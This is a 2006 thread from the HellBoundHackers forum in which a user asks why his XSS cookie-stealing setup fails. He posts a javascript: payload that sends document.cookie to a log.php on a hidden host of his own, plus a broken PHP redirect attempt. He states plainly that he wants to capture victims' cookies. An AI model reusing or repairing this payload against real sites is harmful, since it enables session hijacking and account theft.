Follow us on Twitter!
One mans freedom fighter, another's terrorist.
Friday, April 25, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 27
Guests Online: 25
Members Online: 2

Registered Members: 82906
Newest Member: ilija
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Author

XSS (Cross Site Scripting)


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 30-01-06 14:32
I recently set up a free web server to host my PHP scripts and try out some XSS. For some reason, it only works if the victim injects this javascript into their URL:
Code
javascript:location.replace('http://[my site]/log.php?' + document.cookie)



(I hid my site for security reasons)

When I try using a redirection PHP script, such as,
Code
<?php
header("url=nojavascript...location.replace('http://[my site]/log.php?' + document.cookie)");
exit;
?>



or something similar, it either doesn't redirect them or it redirects them to http://[my site]/log.php? without the cookie. Also, I can't find any good XSS holes in a site where I can redirect them directly using XSS.


Thanks,

SlimTim10
Author

RE: XSS (Cross Site Scripting)


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 30-01-06 14:36
Hmmm, WTF is th question?


Author

RE: XSS (Cross Site Scripting)


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 30-01-06 14:56
Maybe read it again? Pfft

I'm wondering why it won't log the cookies. I think I'm doing it correctly, but obviously if it's not working, something is wrong. My question is, could someone point out the problem for me?

And does +document.cookie work in PHP scripting, or only in javascript?

Also, is there an easier way to inject javascript into a victim's URL?

Edited by on 30-01-06 14:58